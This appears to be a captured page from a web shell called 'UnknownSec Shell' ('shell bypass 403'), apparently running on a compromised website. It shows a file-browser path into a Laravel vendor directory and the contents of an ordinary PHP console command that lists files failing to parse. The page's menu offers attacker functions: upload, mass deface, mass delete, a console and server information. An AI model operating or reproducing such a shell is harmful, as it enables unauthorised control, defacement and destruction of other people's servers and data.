shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
ajthinking
/
archetype
/
src
/
Commands
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ErrorsCommand.php
<?php namespace Archetype\Commands; use Illuminate\Console\Command; use Archetype\Support\Exceptions\FileParseError; use Archetype\Endpoints\PHP\PHPFileQueryBuilder; class ErrorsCommand extends Command { protected $signature = 'archetype:errors'; protected $description = 'List dirty files'; protected $result; protected $errors; public function handle() { $queryBuilder = new PHPFileQueryBuilder; $this->errors = collect(); $filePaths = $queryBuilder->recursiveFileSearch(''); $this->result = collect($filePaths)->map(function ($filePath) { try { app()->make('PHPFile')->load($filePath); } catch (FileParseError $error) { $this->errors->push([ 'path' => $filePath, 'message' => $error->original->getMessage() ]); } }); if ($this->errors->isEmpty()) { $this->info('No errors found!'); return; } $this->table(['path', 'message'], $this->errors->toArray()); } }
© 2026 UnknownSec